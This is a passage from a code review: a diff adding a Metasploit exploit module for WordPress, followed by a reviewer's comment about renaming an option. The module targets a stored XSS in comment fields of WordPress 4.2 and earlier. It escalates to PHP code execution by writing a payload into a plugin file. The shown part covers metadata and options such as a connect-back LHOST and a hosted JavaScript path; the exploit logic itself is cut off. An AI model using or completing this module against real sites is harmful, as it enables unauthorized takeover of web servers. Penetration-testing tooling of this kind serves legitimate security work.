modules/exploits/unix/webapp/wp_comment_overflow_exec.rb

```diff
@@ -0,0 +1,143 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+    Rank = ExcellentRanking
+
+    include Msf::Exploit::Remote::HttpClient
+    include Msf::Exploit::Remote::HttpServer::HTML
+    include Rex::Text
+
+    def initialize(info={})
+        super(update_info(info,
+            'Name'           => "WordPress Administrator Remote Code Execution Through XSS",
+            'Description'    => %q{
+                    This module exploits a XSS vulnerability found in WordPress 4.2, 4.1.2, 4.1.1, and 3.9.3. This vulnerability allows an unauthenticated attacker to inject arbitrary JavaScript code into comment fields. The module utilizes administrator authenticated XSS escalation through the WordPress plugin editor to gain remote code execution.
+            },
+            'License'        => MSF_LICENSE,
+            'Author'         =>
+                [
+                    'Jouko Pynnonen', 	  #Initial Proof of Concept
+                    'Matthew Toussain'	  #Everything else
+                ],
+            'References'     =>
+                [
+                    ['URL', 'http://kinozoa.com/blog/wordpress-4-2-comment-field-overflow/'],
+                    ['URL', 'http://klikki.fi/adv/wordpress2.html']
+                ],
+            'Arch'           => ARCH_PHP,
+            'Payload'          =>
+                {
+                    'DisableNops' => true,
+                    'Compat'              =>
+                        {
+                            'ConnectionType' => 'find',
+                        },
+                        # Arbitrary big number. The payload gets sent as an HTTP
+                        # response body, so really it's unlimited
+                        'Space'       => 262144, # 256k
+                },
+            'Platform'       => 'php',
+            'Targets'        =>
+                [
+                    ['Wordpress <= 4.2, 4.1.2, 4.1.1, 3.9.3', {}]
+                ],
+            'Privileged'     => false,
+            'DisclosureDate'  => "Apr 26 2015",
+            'DefaultTarget'  => 0))
+
+        register_options(
+            [
+                OptString.new('PLUGIN',  [true, 'This is the WordPress plugin file that will be written to.','akismet/akismet.php']),
+                OptString.new('COMMENTID',  [true, 'This is id of the WordPress page that will be commented on.','1']),
+                OptString.new('RHOST',  [true, 'This is the WordPress install directory']),
+                OptString.new('LHOST',  [true, 'This is the IP to connect back to for the javascript','0.0.0.0']),
+                OptString.new('URIPATH', [true, 'This is the URI path that will be created for the javascript hosted file','wp-met.js']),
```

Comment:
Rename this to something like UPLOAD_PATH where the payload will be uploaded. URIPATH is not correct.